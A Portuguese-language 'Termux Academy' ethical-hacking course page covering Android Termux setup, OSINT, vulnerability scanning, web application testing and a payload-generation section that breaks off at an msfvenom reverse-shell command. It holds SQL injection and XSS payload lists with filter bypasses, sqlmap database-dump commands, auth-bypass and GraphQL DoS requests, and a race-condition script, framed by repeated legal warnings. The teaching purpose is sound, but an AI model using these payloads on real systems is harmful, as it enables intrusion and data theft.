Termux Academy
A jornada completa do Junior ao Master em Ethical Hacking
Trilha de Aprendizado Completa
Iniciante
Fundamentos, configuração e comandos básicos
Intermediário
Reconhecimento, scanning e exploração
Avançado
Automation, forensics e técnicas avançadas
O Que é o Termux?
O Termux é muito mais que um simples emulador de terminal para Android. É um ambiente Linux completo que transforma seu smartphone em uma estação de trabalho de cybersecurity portátil e poderosa.
- Ambiente Linux completo sem necessidade de root
- Mais de 1000+ pacotes disponíveis via APT
- Suporte completo para Python, Node.js, Go, Rust, C/C++
- Integração total com armazenamento do Android
- Ferramentas profissionais de penetration testing
⚠️ AVISO CRÍTICO SOBRE USO ÉTICO
Este curso contém conhecimento extremamente poderoso. Com grandes poderes vêm grandes responsabilidades.
IMPORTANTE:
- • NUNCA teste em sistemas que não são seus
- • SEMPRE obtenha autorização por escrito
- • Use apenas em ambientes controlados (laboratórios, VMs próprias)
- • O objetivo é defender, não atacar
- • Violações podem resultar em processo criminal
Quick Start - Primeiros Passos
1. Instalação Correta
Baixe sempre do F-Droid para ter a versão mais atualizada:
📱 F-Droid → Buscar "Termux" → Instalar
2. Primeiro Boot
Atualize o sistema imediatamente:
pkg update && pkg upgrade -y
Configuração Inicial Profissional
Transforme seu Android numa estação de trabalho de cybersecurity
1. Instalação Correta e Segura
CRÍTICO: NUNCA instale do Google Play Store! A versão está desatualizada e tem problemas de segurança.
Método Recomendado - F-Droid
Instalar F-Droid
Baixe de: https://f-droid.org
Buscar Termux
No F-Droid, procure por "Termux"
Instalar Termux
Versão sempre atualizada
Add-ons Opcionais
Termux:API, Termux:Widget, Termux:Tasker
Verificação de Integridade
2. Atualização e Otimização do Sistema
Atualização Completa do Sistema
Execute estes comandos na sequência para garantir que tudo esteja atualizado:
# Atualização básica
pkg update && pkg upgrade -y
# Atualização completa com limpeza
pkg update
pkg upgrade -y
pkg autoclean
pkg autoremove
# Script de atualização automática
echo '#!/bin/bash
pkg update -y
pkg upgrade -y
pkg autoclean
echo "Sistema atualizado com sucesso!"
' > $PREFIX/bin/update-system && chmod +x $PREFIX/bin/update-system
3. Configuração de Armazenamento Avançada
Acesso ao Armazenamento
Configure o acesso completo ao sistema de arquivos do Android:
# Configurar acesso ao armazenamento
termux-setup-storage
# Verificar mapeamentos criados
ls -la storage/
Após executar, conceda a permissão de armazenamento quando solicitado pelo Android.
Estrutura de Pastas
4. Pacotes Essenciais para CyberSecurity
Ferramentas Básicas
# Essenciais do sistema
pkg install -y git curl wget nano vim openssh
# Linguagens de programação
pkg install -y python nodejs golang rust clang
# Ferramentas de rede
pkg install -y nmap netcat-openbsd iproute2 dnsutils
# Utilitários
pkg install -y htop tree file which
Ferramentas de Hacking
# Repositórios especializados
pkg install -y unstable-repo x11-repo root-repo
# Ferramentas de pentest
pkg install -y hydra sqlmap nikto dirb hashcat
# Análise forense
pkg install -y binwalk exiftool foremost
# Compiladores e depuradores
pkg install -y gdb radare2 objdump
5. Customização Avançada do Terminal
Oh My Zsh + Plugins Profissionais
# Instalar Zsh e Oh My Zsh
pkg install -y zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# Plugins essenciais
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting
# Tema Powerlevel10k
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k
Configuração .zshrc Otimizada
# Backup e criar novo .zshrc
cp ~/.zshrc ~/.zshrc.backup
cat > ~/.zshrc << 'EOF'
export ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="powerlevel10k/powerlevel10k"
plugins=(
git
zsh-autosuggestions
zsh-syntax-highlighting
command-not-found
colored-man-pages
extract
web-search
)
source $ZSH/oh-my-zsh.sh
# Aliases personalizados para hacking
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
# Aliases específicos para pentest
alias nse='nmap --script-help'
alias ports='netstat -tuln'
alias ips='ip addr show'
alias routes='ip route show'
# Funções úteis
extract() {
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar e $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
EOF
# Aplicar configurações
source ~/.zshrc
6. Configurações de Segurança
SSH Server Setup
# Instalar e configurar SSH
pkg install openssh
# Gerar chaves SSH
ssh-keygen -t ed25519 -C "termux@android"
# Configurar sshd
echo "Port 8022
PasswordAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys" > $PREFIX/etc/ssh/sshd_config
# Definir senha para o usuário
passwd
# Iniciar SSH server
sshd
Backup e Recovery
# Script de backup automático
mkdir -p ~/backups
cat > ~/backups/backup.sh << 'EOF'
#!/bin/bash
DATE=$(date +%Y%m%d_%H%M%S)
BACKUP_DIR="~/backups"
tar -czf "$BACKUP_DIR/termux_backup_$DATE.tar.gz" \
-C $HOME \
--exclude="backups" \
--exclude=".cache" \
.
echo "Backup criado: termux_backup_$DATE.tar.gz"
EOF
chmod +x ~/backups/backup.sh
Parabéns! Seu Termux agora está configurado profissionalmente. Continue para os módulos de comandos e ferramentas avançadas.
Domínio Completo de Linux
Fundamentos essenciais para hackers éticos profissionais
Terminal Interativo - Pratique Agora
Terminal Funcional: Este é um terminal real usando xterm.js! Experimente comandos como: ls, pwd, date, whoami, clear, help
Ambiente de Desenvolvimento Avançado
Transforme seu Termux numa workstation completa
Linguagens de Programação
🐍 Python Completo
# Python + pip + ferramentas
pkg install python python-pip
pip install --upgrade pip
# Bibliotecas essenciais para hacking
pip install requests beautifulsoup4 scapy
pip install colorama pyfiglet termcolor
pip install cryptography paramiko
🟢 Node.js + NPM
# Node.js LTS
pkg install nodejs npm
# Ferramentas globais úteis
npm install -g http-server
npm install -g wscat
npm install -g nodemon
🦀 Rust + Cargo
# Rust para ferramentas rápidas
pkg install rust
# Ferramentas úteis em Rust
cargo install ripgrep bat fd-find
cargo install tokei hyperfine
Ferramentas de Desenvolvimento
Editores Avançados
# Vim com plugins
pkg install vim
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
# Neovim (mais moderno)
pkg install neovim
# Micro editor (user-friendly)
pkg install micro
# Emacs
pkg install emacs
Git e Controle de Versão
# Git completo
pkg install git
# Configuração global
git config --global user.name "Seu Nome"
git config --global user.email "email@exemplo.com"
# Aliases úteis
git config --global alias.st status
git config --global alias.co checkout
git config --global alias.br branch
Ambientes Virtuais e Containers
Python Virtual Environments
# Criar ambiente virtual
python -m venv projeto-hack
# Ativar ambiente
source projeto-hack/bin/activate
# Instalar dependências
pip install -r requirements.txt
# Desativar ambiente
deactivate
Docker no Termux
# Instalar Docker (experimental)
pkg install docker
# Executar container Kali Linux
docker pull kalilinux/kali-rolling
# Container interativo
docker run -it kalilinux/kali-rolling /bin/bash
Reconhecimento Passivo Profissional
A arte de coletar informações sem ser detectado
Framework OSINT Completo
🌐 Nmap - O Rei dos Scanners
# Instalação
pkg install nmap
# Scan básico
nmap scanme.nmap.org
# Scan stealth
nmap -sS -O scanme.nmap.org
# Vulnerabilidades
nmap --script vuln scanme.nmap.org
# Scan completo
nmap -A -T4 scanme.nmap.org
🔍 Whois e DNS
# Whois completo
pkg install whois
whois google.com
# DNS avançado
pkg install dnsutils
dig google.com ANY
nslookup google.com
# DNS reverso
dig -x 8.8.8.8
🕷️ Web Crawling
# wget recursivo
wget -r -np -k --random-wait https://example.com
# curl com headers
curl -I https://example.com
# Lynx browser text
pkg install lynx
lynx -dump https://example.com
📊 Shodan CLI
# Instalar Shodan
pip install shodan
# Configurar API key
shodan init SUA_API_KEY
# Buscar dispositivos
shodan search "apache"
shodan host 8.8.8.8
🎯 Subdomain Enumeration
# Subfinder
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
subfinder -d example.com
# Assetfinder
go install github.com/tomnomnom/assetfinder@latest
assetfinder example.com
📱 Social Media OSINT
# Sherlock - username search
git clone https://github.com/sherlock-project/sherlock.git
cd sherlock
pip install -r requirements.txt
python sherlock.py username
Ferramentas OSINT Avançadas
TheHarvester - Email e Subdomain
# Instalar TheHarvester
git clone https://github.com/laramies/theHarvester.git
cd theHarvester
pip install -r requirements.txt
# Buscar emails e subdomains
python theHarvester.py -d example.com -l 100 -b google
python theHarvester.py -d example.com -b all
Recon-ng Framework
# Instalar Recon-ng
git clone https://github.com/lanmaster53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS
# Executar
python recon-ng
# Dentro do recon-ng
marketplace search
modules load recon/domains-hosts/hackertarget
info
options set SOURCE example.com
run
Workflow de Reconhecimento Profissional
Script Automatizado de Recon
#!/bin/bash
# Auto Recon Script
TARGET=$1
if [ -z "$TARGET" ]; then
echo "Uso: $0 "
exit 1
fi
echo "[+] Iniciando reconhecimento para $TARGET"
# 1. Whois
echo "[+] Coletando WHOIS..."
whois $TARGET > whois_$TARGET.txt
# 2. DNS
echo "[+] Enumeração DNS..."
dig $TARGET ANY > dns_$TARGET.txt
# 3. Subdomains
echo "[+] Buscando subdomínios..."
subfinder -d $TARGET -o subdomains_$TARGET.txt
# 4. Nmap
echo "[+] Port scan..."
nmap -sV -oN nmap_$TARGET.txt $TARGET
echo "[+] Reconhecimento completo!"
Python OSINT Script
#!/usr/bin/env python3
import requests
import socket
import dns.resolver
def osint_target(domain):
print(f"[+] OSINT para {domain}")
# IP Resolution
try:
ip = socket.gethostbyname(domain)
print(f"[+] IP: {ip}")
except:
print("[-] Erro ao resolver IP")
# HTTP Headers
try:
r = requests.get(f"http://{domain}")
print(f"[+] Server: {r.headers.get('Server')}")
print(f"[+] Status: {r.status_code}")
except:
print("[-] Erro HTTP")
# DNS Records
try:
mx = dns.resolver.resolve(domain, 'MX')
print(f"[+] MX Records: {[str(x) for x in mx]}")
except:
print("[-] Sem MX records")
if __name__ == "__main__":
target = input("Digite o domínio: ")
osint_target(target)
Fase 2: Varredura e Análise de Vulnerabilidades
Nesta fase, interagimos mais ativamente com o alvo para identificar portas abertas, serviços em execução e possíveis vulnerabilidades.
Nmap - Scans Avançados
O Nmap pode fazer muito mais do que apenas descobrir hosts. Ele pode detectar versões de serviços, sistemas operacionais e até mesmo usar scripts para encontrar vulnerabilidades.
Scan de Versão de Serviços (-sV):
nmap -sV scanme.nmap.org
Scan com Scripts Padrão (-sC):
nmap -sC scanme.nmap.org
Scan Agressivo (-A):
nmap -A scanme.nmap.org
Fase 3: Obtenção de Acesso (Exploração)
Após identificar uma vulnerabilidade, esta fase foca em usar um "exploit" para obter acesso não autorizado ao sistema.
Metasploit Framework
O Metasploit é uma das mais poderosas e populares plataformas para desenvolvimento e execução de exploits. Sua instalação no Termux requer alguns passos.
Instalação (pode demorar):
pkg install unstable-repo -y
pkg install metasploit -y
Executando o Metasploit:
Após a instalação, você pode iniciar o console do Metasploit com um único comando.
msfconsole
O uso do Metasploit é um campo de estudo vasto. A partir do console, você pode procurar por exploits (search
), selecionar um (use
), configurar as opções (set
) e executar (exploit
).
Fase 4: Defesa e Análise de Tráfego
Entender as ferramentas de ataque também nos ensina como nos defender. Uma das melhores maneiras é analisar o tráfego da sua própria rede.
Tcpdump
Uma poderosa ferramenta de linha de comando para capturar e analisar pacotes de rede. Permite ver em tempo real o que está acontecendo na sua conexão.
Instalação:
pkg install tcpdump
Exemplo de Uso (escutar na interface wlan0):
Este comando precisa ser executado como root, o que não é o padrão no Termux. Para redes locais, seu uso é mais prático em um Linux de desktop.
# tcpdump -i wlan0
Avisos Legais e Conduta Ética
É fundamental reiterar os pontos sobre a legalidade e a ética no campo da segurança da informação.
- Autorização é a Chave: Nunca realize testes, scans ou tentativas de exploração em sistemas, redes ou aplicativos sem a permissão explícita e por escrito do proprietário.
- A Intenção Importa: A diferença entre um hacker ético (pentester) e um criminoso digital (cracker) está na autorização e na intenção. O objetivo do pentester é encontrar e reportar falhas para que sejam corrigidas, fortalecendo a segurança.
- Consequências Reais: Acessar sistemas de computadores sem autorização é crime previsto em lei em praticamente todos os países, incluindo o Brasil (Lei Carolina Dieckmann e Marco Civil da Internet), com penas que podem incluir multas e prisão.
- Ambiente de Laboratório: A melhor forma de aprender é construindo seu próprio laboratório. Use máquinas virtuais (com VirtualBox ou VMware) ou contêineres (Docker) para criar alvos seguros e legais para praticar suas habilidades.
Use o conhecimento para o bem.
Aprenda a atacar para saber como defender. O mercado de trabalho para profissionais de cibersegurança qualificados e éticos está em constante crescimento.
OSINT Avançado
Inteligência de Fontes Abertas: Coletando Informações Como um Profissional
Metodologia OSINT Profissional
1. Definir Alvo
Identificar pessoa, empresa ou domínio
2. Mapear Fontes
Redes sociais, sites, registros públicos
3. Coletar Dados
Extrair informações de forma passiva
4. Analisar
Correlacionar e validar informações
🔧 Toolkit OSINT Essencial
🌐 Web Intelligence
- • Shodan (IoT/Devices)
- • Censys (Certificates)
- • Wayback Machine
- • Google Dorking
- • TheHarvester
📱 Social Media
- • Sherlock (Username)
- • Social Searcher
- • TinEye (Reverse Image)
- • Maltego
- • Spiderfoot
🔍 Domain/IP Intelligence
- • Whois Lookup
- • DNS Enumeration
- • Sublist3r
- • Amass
- • DNSRecon
Scripts OSINT Automatizados
🔍 Domain Intelligence Script
# Instalar ferramentas OSINT
pkg update && pkg upgrade -y
pkg install python python-pip git nmap
pip install requests beautifulsoup4
# TheHarvester - Email/Subdomain Collection
git clone https://github.com/laramies/theHarvester
cd theHarvester
pip install -r requirements.txt
# Uso básico
python3 theHarvester.py -d example.com -b google,bing,yahoo
🌐 Shodan API Integration
#!/usr/bin/env python3
import shodan
import requests
def shodan_search(query, api_key):
api = shodan.Shodan(api_key)
try:
results = api.search(query)
print(f'[+] {results["total"]} results found')
for result in results['matches']:
print(f'IP: {result["ip_str"]}')
print(f'Port: {result["port"]}')
print(f'Organization: {result.get("org", "N/A")}')
print('-' * 40)
except shodan.APIError as e:
print(f'Error: {e}')
# Exemplo de uso
# shodan_search('apache', 'YOUR_API_KEY')
Técnicas OSINT Avançadas
🔍 Google Dorking Avançado
Operadores Essenciais:
Dorks Práticos:
📊 Análise de Metadados
# Instalar ExifTool
pkg install exiftool
# Analisar metadados de imagem
exiftool image.jpg
# Extrair informações GPS
exiftool -gps:all -c "%.6f" image.jpg
# Limpar metadados (sanitizar)
exiftool -all= -overwrite_original image.jpg
🕸️ Web Scraping Ético
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import time
def scrape_emails(url):
headers = {'User-Agent': 'Mozilla/5.0 (compatible; OSINT-Bot/1.0)'}
try:
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.content, 'html.parser')
# Encontrar emails
import re
email_pattern = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
emails = re.findall(email_pattern, response.text)
return list(set(emails)) # Remove duplicatas
except Exception as e:
print(f'Erro: {e}')
return []
# Respeitar robots.txt e rate limits
time.sleep(1) # 1 segundo entre requests
⚖️ Ética e Legalidade em OSINT
✅ Práticas Éticas:
- • Usar apenas fontes públicas
- • Respeitar termos de serviço
- • Não violar privacidade
- • Rate limiting em requests
- • Documentar metodologia
❌ Evitar:
- • Social engineering ativo
- • Violação de sistemas
- • Stalking ou harassment
- • Uso malicioso de dados
- • Violação de leis locais
Vulnerability Assessment
Identificação e Análise Sistemática de Vulnerabilidades
Metodologia de Avaliação de Vulnerabilidades
1. Escopo
Definir alvos e limites
2. Discovery
Identificar ativos e serviços
3. Scan
Detectar vulnerabilidades
4. Análise
Classificar e priorizar
5. Report
Documentar achados
🎯 Categorias de Vulnerabilidades (OWASP)
🔴 Críticas
- • Remote Code Execution (RCE)
- • SQL Injection
- • Authentication Bypass
- • Privilege Escalation
- • Directory Traversal
🟡 Altas
- • Cross-Site Scripting (XSS)
- • CSRF Attacks
- • Insecure Direct Object References
- • Security Misconfiguration
- • Sensitive Data Exposure
🟢 Médias/Baixas
- • Information Disclosure
- • Weak Password Policy
- • Missing Security Headers
- • Outdated Components
- • Insufficient Logging
Ferramentas de Vulnerability Assessment
🔍 Nessus - Scanner Profissional
# Instalar Nessus no Termux (simulação)
# Nessus é comercial, mas existe versão home gratuita
# Download do Nessus Home
wget https://www.tenable.com/downloads/nessus
# OpenVAS como alternativa open source
pkg install openvas
# Configurar OpenVAS
openvas-setup
openvas-start
# Acessar via browser: https://localhost:9392
Recursos: 65,000+ plugins, compliance checks, credentialed scanning
⚡ Nuclei - Fast Vulnerability Scanner
# Instalar Nuclei
pkg install golang
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Atualizar templates
nuclei -update-templates
# Scan básico
nuclei -u https://target.com
# Scan com severidade específica
nuclei -u https://target.com -severity critical,high
# Scan com templates específicos
nuclei -u https://target.com -t cves/ -t vulnerabilities/
Vantagens: Rápido, templates atualizados, integração CI/CD
🐉 Nikto - Web Vulnerability Scanner
# Instalar Nikto
pkg install nikto
# Scan básico
nikto -h https://target.com
# Scan com plugins específicos
nikto -h target.com -Plugins outdated,headers
# Scan com output em XML
nikto -h target.com -Format xml -output results.xml
# Scan evasivo (slower but stealthier)
nikto -h target.com -evasion 1234567
Especialidade: Web servers, 6,700+ vulnerability tests
🔐 Lynis - System Hardening Scanner
# Instalar Lynis
pkg install lynis
# Auditoria completa do sistema
lynis audit system
# Auditoria específica (networking)
lynis audit system --tests-category networking
# Gerar relatório detalhado
lynis audit system --report-file /tmp/lynis-report.dat
# Verificar hardening score
lynis show report
Foco: System hardening, compliance, configuration security
Análise Avançada de Vulnerabilidades
📊 Sistema de Scoring CVSS 3.1
Base Score (0-10):
- 9.0-10.0 - Critical
- 7.0-8.9 - High
- 4.0-6.9 - Medium
- 0.1-3.9 - Low
Métricas Base:
- • Attack Vector (AV)
- • Attack Complexity (AC)
- • Privileges Required (PR)
- • User Interaction (UI)
- • Scope (S)
Impacto:
- • Confidentiality (C)
- • Integrity (I)
- • Availability (A)
🎯 Priorização de Vulnerabilidades
#!/usr/bin/env python3
"""
Sistema de Priorização de Vulnerabilidades
Combina CVSS Score + Exploitabilidade + Contexto de Negócio
"""
def calculate_priority(cvss_score, exploitability, business_impact, asset_value):
# Normalizar valores (0-1)
cvss_norm = cvss_score / 10.0
exploit_norm = exploitability / 10.0 # 1-10 scale
business_norm = business_impact / 5.0 # 1-5 scale
asset_norm = asset_value / 5.0 # 1-5 scale
# Pesos (ajustar conforme necessário)
weight_cvss = 0.3
weight_exploit = 0.25
weight_business = 0.25
weight_asset = 0.2
priority_score = (
cvss_norm * weight_cvss +
exploit_norm * weight_exploit +
business_norm * weight_business +
asset_norm * weight_asset
) * 10
if priority_score >= 8.5:
return "CRITICAL - Remediate immediately"
elif priority_score >= 7.0:
return "HIGH - Remediate within 24-48h"
elif priority_score >= 5.0:
return "MEDIUM - Remediate within 1 week"
else:
return "LOW - Remediate within 30 days"
# Exemplo de uso
vuln_priority = calculate_priority(
cvss_score=9.8, # CVSS Score
exploitability=8, # Facilidade de exploração
business_impact=4, # Impacto no negócio
asset_value=5 # Valor do ativo
)
print(f"Prioridade: {vuln_priority}")
Gestão Automatizada de Vulnerabilidades
🔄 Pipeline CI/CD Security
# .github/workflows/security-scan.yml
name: Security Vulnerability Scan
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
jobs:
security-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Run Nuclei Scan
uses: projectdiscovery/nuclei-action@main
with:
target: 'https://staging.example.com'
templates: 'cves,vulnerabilities'
- name: Run OWASP ZAP Baseline
uses: zaproxy/action-baseline@v0.4.0
with:
target: 'https://staging.example.com'
- name: Upload Results
uses: actions/upload-artifact@v2
with:
name: security-reports
path: reports/
📈 Vulnerability Metrics Dashboard
# Script para métricas de vulnerabilidades
#!/bin/bash
# Configurar variáveis
REPORT_DIR="/tmp/vuln-reports"
DATE=$(date +%Y%m%d)
echo "=== Vulnerability Assessment Report ==="
echo "Date: $(date)"
echo "========================================"
# Contadores por severidade
CRITICAL=$(grep -c "CRITICAL" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
HIGH=$(grep -c "HIGH" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
MEDIUM=$(grep -c "MEDIUM" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
LOW=$(grep -c "LOW" $REPORT_DIR/*.xml 2>/dev/null || echo 0)
echo "Critical: $CRITICAL"
echo "High: $HIGH"
echo "Medium: $MEDIUM"
echo "Low: $LOW"
echo "Total: $((CRITICAL + HIGH + MEDIUM + LOW))"
# Gerar gráfico ASCII simples
echo ""
echo "Risk Distribution:"
echo "Critical: $(printf '%*s' $CRITICAL | tr ' ' '█')"
echo "High: $(printf '%*s' $HIGH | tr ' ' '█')"
echo "Medium: $(printf '%*s' $MEDIUM | tr ' ' '█')"
echo "Low: $(printf '%*s' $LOW | tr ' ' '█')"
🛡️ Melhores Práticas em Vulnerability Assessment
✅ Processo:
- • Scans regulares e automatizados
- • Correlação entre diferentes ferramentas
- • Validação manual de falsos positivos
- • Priorização baseada em risco
- • Tracking de remediation
- • Métricas e KPIs definidos
⚠️ Cuidados:
- • Não confiar apenas em scanners automatizados
- • Considerar impacto no negócio antes de corrigir
- • Testar patches em ambiente de desenvolvimento
- • Manter inventário atualizado de ativos
- • Comunicar riscos para stakeholders
- • Documentar exceções e compensatory controls
Web Application Testing
Testes Avançados de Segurança em Aplicações Web
OWASP Top 10 - 2021 Edition
Broken Access Control
Controle de acesso falho
Cryptographic Failures
Falhas criptográficas
Injection
Injeção de código
Insecure Design
Design inseguro
Security Misconfiguration
Configuração insegura
Vulnerable Components
Componentes vulneráveis
Authentication Failures
Falhas de autenticação
Software Integrity Failures
Falhas de integridade
Logging Failures
Falhas de logging
SSRF
Server-Side Request Forgery
Ferramentas de Web Application Testing
🕷️ OWASP ZAP - Web App Scanner
# Instalar OWASP ZAP
pkg install openjdk-17
wget https://github.com/zaproxy/zaproxy/releases/download/v2.12.0/ZAP_2.12.0_Linux.tar.gz
tar -xzf ZAP_2.12.0_Linux.tar.gz
# Scan básico (headless)
./zap.sh -cmd -quickurl https://target.com -quickout report.html
# Scan com spider + active scan
./zap.sh -cmd -quickurl https://target.com -quickprogress -quickout report.xml
# Scan com autenticação
./zap.sh -cmd -configfile session.config -quickurl https://target.com
# API scan
./zap.sh -cmd -openapiurl https://target.com/api/swagger.json
🔥 Burp Suite Community
# Instalar Burp Suite Community
pkg install openjdk-17
wget https://portswigger.net/burp/releases/download?product=community
# Configurar proxy (127.0.0.1:8080)
# No navegador: Configurar proxy para localhost:8080
# Configurar certificado SSL
# 1. Acessar http://burp no navegador
# 2. Download CA Certificate
# 3. Instalar certificado no sistema
# Comandos úteis do Burp:
# Ctrl+I - Enviar para Intruder
# Ctrl+R - Enviar para Repeater
# Ctrl+Shift+B - Enviar para Scanner (Pro only)
⚡ SQLmap - SQL Injection Tool
# Instalar SQLmap
pkg install python
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
# Teste básico de SQL Injection
python sqlmap.py -u "http://target.com/page.php?id=1"
# Com cookies de sessão
python sqlmap.py -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"
# Dump de database específica
python sqlmap.py -u "http://target.com/page.php?id=1" --dbs
# Dump de tabelas específicas
python sqlmap.py -u "http://target.com/page.php?id=1" -D database_name --tables
# Dump de dados específicos
python sqlmap.py -u "http://target.com/page.php?id=1" -D db_name -T table_name --dump
🔍 Gobuster - Directory/File Bruteforcer
# Instalar Gobuster
pkg install golang
go install github.com/OJ/gobuster/v3@latest
# Directory bruteforcing
gobuster dir -u https://target.com -w /path/to/wordlist.txt
# Com extensões específicas
gobuster dir -u https://target.com -w wordlist.txt -x php,html,js,txt
# DNS subdomain enumeration
gobuster dns -d target.com -w subdomains.txt
# Virtual host discovery
gobuster vhost -u https://target.com -w vhosts.txt
# API endpoint discovery
gobuster dir -u https://api.target.com -w api-wordlist.txt -p pattern
Técnicas de Teste Manual
💉 Testes de Injection
SQL Injection Payloads:
# Basic payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
1' UNION SELECT null,null,null--
1' AND (SELECT SUBSTRING(@@version,1,1))='5'--
# Time-based blind
1' AND (SELECT SLEEP(5))--
1' AND (SELECT * FROM (SELECT SLEEP(5))a)--
# Boolean-based blind
1' AND ASCII(SUBSTRING((SELECT user()),1,1))=114--
XSS Payloads:
# Basic XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
# DOM-based XSS
#<script>alert('XSS')</script>
🔐 Authentication & Authorization Testing
Checklist Básico:
- • Username enumeration
- • Weak password policy
- • Brute force protection
- • Session management
- • Privilege escalation
Bypass Técnicas:
- • Parameter pollution
- • HTTP method bypass
- • Path traversal
- • IDOR attacks
- • JWT manipulation
Session Testing:
- • Cookie security flags
- • Session fixation
- • Session timeout
- • Concurrent sessions
- • Logout functionality
🌐 Business Logic Testing
#!/usr/bin/env python3
"""
Business Logic Testing Scenarios
Testes específicos para lógica de negócio
"""
# Cenários comuns de teste:
# 1. Race Conditions
# - Multiple simultaneous requests
# - Timing attacks on critical operations
# 2. Workflow Bypass
# - Skip steps in multi-step processes
# - Access restricted functions directly
# 3. Price Manipulation
# - Negative quantities
# - Currency manipulation
# - Discount abuse
# 4. Data Validation Bypass
# - Unexpected data types
# - Boundary value testing
# - Input length restrictions
# Exemplo: Teste de race condition
import threading
import requests
def concurrent_request():
response = requests.post('https://target.com/api/withdraw',
json={'amount': 1000},
headers={'Authorization': 'Bearer token123'})
print(f"Status: {response.status_code}")
# Executar 10 requests simultâneos
threads = []
for i in range(10):
t = threading.Thread(target=concurrent_request)
threads.append(t)
t.start()
for t in threads:
t.join()
API Security Testing
🔌 REST API Testing
# Usando curl para testes de API
# 1. Enumeração de endpoints
curl -X GET https://api.target.com/v1/
curl -X OPTIONS https://api.target.com/v1/users
# 2. Authentication bypass
curl -X GET https://api.target.com/v1/admin/users
curl -X GET https://api.target.com/v1/users/1 -H "X-Original-URL: /admin"
# 3. HTTP Method tampering
curl -X DELETE https://api.target.com/v1/users/1
curl -X PUT https://api.target.com/v1/users/1 -d '{"role":"admin"}'
# 4. Parameter pollution
curl "https://api.target.com/v1/user?id=1&id=2"
# 5. Mass Assignment
curl -X POST https://api.target.com/v1/users \
-H "Content-Type: application/json" \
-d '{"username":"test","role":"admin","is_active":true}'
📊 GraphQL Testing
# GraphQL Introspection
curl -X POST https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query IntrospectionQuery {__schema {queryType {name}}}"}'
# Schema discovery
curl -X POST https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name,fields{name,type{name}}}}}"}'
# Depth-based attack (DoS)
curl -X POST https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query{user{posts{comments{author{posts{comments{author{name}}}}}}}}"}'
# Batch attack
curl -X POST https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '[{"query":"query{user(id:1){name}}"},{"query":"query{user(id:2){name}}"}]'
📋 Relatório de Web Application Testing
🎯 Elementos Essenciais:
- • Executive Summary com risk overview
- • Metodologia e ferramentas utilizadas
- • Vulnerabilidades por categoria OWASP
- • Screenshots e evidências técnicas
- • Proof of Concept (PoC) quando aplicável
- • Impacto de negócio de cada achado
- • Recomendações específicas de correção
- • Timeline para remediation
⚠️ Considerações Importantes:
- • Testar apenas aplicações autorizadas
- • Não causar downtime ou perda de dados
- • Documentar todos os testes realizados
- • Manter confidencialidade dos achados
- • Seguir responsible disclosure
- • Validar correções após implementação
- • Considerar falsos positivos
- • Priorizar by business risk
Payload Generation
Criação e Customização de Payloads para Testes de Penetração
⚠️ AVISO CRÍTICO DE SEGURANÇA
Payloads são ferramentas de TESTE AUTORIZADO! Este conteúdo é estritamente para pentesting ético e educação em ambientes controlados.
Usar contra sistemas não autorizados é CRIME FEDERAL com penas de até 10 anos de prisão. Use apenas em labs próprios ou com autorização escrita.
Tipos e Categorias de Payloads
Reverse Shells
Conexão de volta para o atacante
Bind Shells
Porta aberta no alvo
Web Shells
Interface web para controle
Memory Injection
Execução direta na memória
🛠️ Ferramentas de Geração
Metasploit Framework:
- • msfvenom - Payload generator
- • msfconsole - Interactive console
- • Custom encoders/modules
- • Multi-stage payloads
- • Platform-specific generation
Custom Generators:
- • PayloadsAllTheThings
- • RevShells.com
- • Custom Python/Bash scripts
- • PowerShell generators
- • Cross-platform builders
Evasion Tools:
- • Veil Framework
- • Shellter (PE infection)
- • TheFatRat
- • Custom obfuscators
- • Anti-sandbox techniques
MSFVenom - Payload Generation Masterclass
🐧 Linux Reverse Shells
# Instalar Metasploit no Termux
pkg install unstable-repo
pkg install metasploit
# Basic Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp \
